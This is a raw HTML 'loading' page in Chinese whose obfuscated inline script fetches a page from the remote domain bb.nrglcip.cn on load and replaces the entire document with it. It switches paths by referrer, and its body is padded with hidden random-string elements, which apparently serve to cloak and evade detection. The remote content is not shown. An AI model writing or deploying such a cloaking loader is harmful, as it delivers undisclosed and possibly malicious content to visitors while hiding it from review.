<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .KUtyZzP1G {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .KUtyZzP1G .A76yXbO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .KUtyZzP1G .content {
            line-height: 50px;
            text-align: center
        }

        .KUtyZzP1G .img {
            width: 100%
        }

        .KUtyZzP1G .j4sYeD {
            text-align: center
        }

        .KUtyZzP1G .j4sYeD span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .KUtyZzP1G .j4sYeD span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .KUtyZzP1G .j4sYeD span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .KUtyZzP1G .j4sYeD span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .KUtyZzP1G .j4sYeD span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .KUtyZzP1G .j4sYeD span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .KUtyZzP1G .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function GMS4mF3zX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var YzG0xvn = GMS4mF3zX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ YzG0xvn +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ YzG0xvn +".html?a=share";
		}
		
        o8GYww=url+"#"+new Date().getTime();
        o8GYww && function() {
            $.get(o8GYww, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>phUCQblBn3C4xa</div>
<p  style='display:none'>hLzl7Ltq3kb91ebFwSN7Gk3mm9DGEG2IwDyxdwYg6gGFft8RYRhq66AsgGdtVktPApwPMS0vCUZxRprCtMSZVdDG3s7J</p>
<a  href='#' style='display:none'>HBuca4qUEvuqWSimH5KQBVptAbFZN2NjUFppceDfarBTqnkJTVwK7O8sZEIYjjeLICm980dQMCGsjrUV1d</a>
<ul style='display:none' >fA84dEuknbbczgd04LcRbLrFBAiUhTD5TjeRMz3o7SrQfOUrhXQOGiSNAvv1R</ul>
<img  src='' style='display:none'>
<li style='display:none' >d87xiQD4bPNfntJn0d5W6WhaJBnJOQU0nLo0yL001BkCWOiavYfYhkyj00yKwt6xREzH</li>
<li style='display:none' >d87xiQD4bPNfntJn0d5W6WhaJBnJOQU0nLo0yL001BkCWOiavYfYhkyj00yKwt6xREzH</li><div class="KUtyZzP1G">
    <div class="A76yXbO">
        <div class="j4sYeD">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >wrOOCR72E4uhv5PSU1ERO7wCPzxB6RqScu5BO6wnJuR4irquEsiebTh</ul>
<ul style='display:none' >wrOOCR72E4uhv5PSU1ERO7wCPzxB6RqScu5BO6wnJuR4irquEsiebTh</ul>
<h1 style='display:none' >n41Uf4iKBm6UxLk3eCJQTuf7rfdu</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >n41Uf4iKBm6UxLk3eCJQTuf7rfdu</h1></body>
</html>